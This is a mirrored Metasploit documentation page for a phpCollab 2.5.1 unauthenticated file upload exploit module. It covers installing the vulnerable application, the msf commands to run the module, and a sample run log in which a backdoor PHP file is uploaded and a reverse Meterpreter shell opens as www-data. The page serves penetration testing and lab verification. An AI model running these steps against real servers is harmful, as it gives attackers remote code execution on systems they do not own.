CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/unix/webapp/phpcollab_upload_exec.md
Views: 1904

Vulnerable Application

This module exploits a file upload vulnerability in phpCollab 2.5.1 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the web server user.

The exploit has been tested on Ubuntu 16.04.3 64-bit

Vulnerable Application Installation

You can download the vulnerable application from the exploit-db page.

Follow the install instructions from the phpCollab website: http://phpcollab.com/documentation/install.htm.

The phpCollab application is only compatible with php5.

Verification Steps

msf > use exploit/unix/webapp/phpcollab_upload_exec
msf exploit(phpcollab_upload_exec) > set RHOST [IP Address] 
msf exploit(phpcollab_upload_exec) > set TARGETURI [Installation Directory] 
msf exploit(phpcollab_upload_exec) > exploit 

## Scenarios

[*] Started reverse TCP handler on 192.168.246.129:4444 
[*] Uploading backdoor file: 1.mEgUkeNnxP.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 192.168.246.144
[*] Meterpreter session 1 opened (192.168.246.129:4444 -> 192.168.246.144:49264) at 2017-12-20 15:44:36 -0500
[+] Deleted 1.mEgUkeNnxP.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > pwd
/var/www/html/phpcollab/logos_clients
meterpreter >